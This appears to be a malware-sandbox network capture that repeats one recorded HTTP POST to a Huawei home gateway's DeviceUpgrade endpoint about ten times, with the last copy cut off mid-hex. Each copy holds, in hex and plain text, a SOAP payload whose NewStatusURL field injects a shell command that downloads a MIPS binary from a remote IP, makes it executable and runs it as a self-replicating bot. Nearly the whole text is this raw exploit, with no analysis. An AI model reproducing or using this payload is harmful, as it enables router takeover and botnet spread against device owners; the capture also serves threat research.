            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 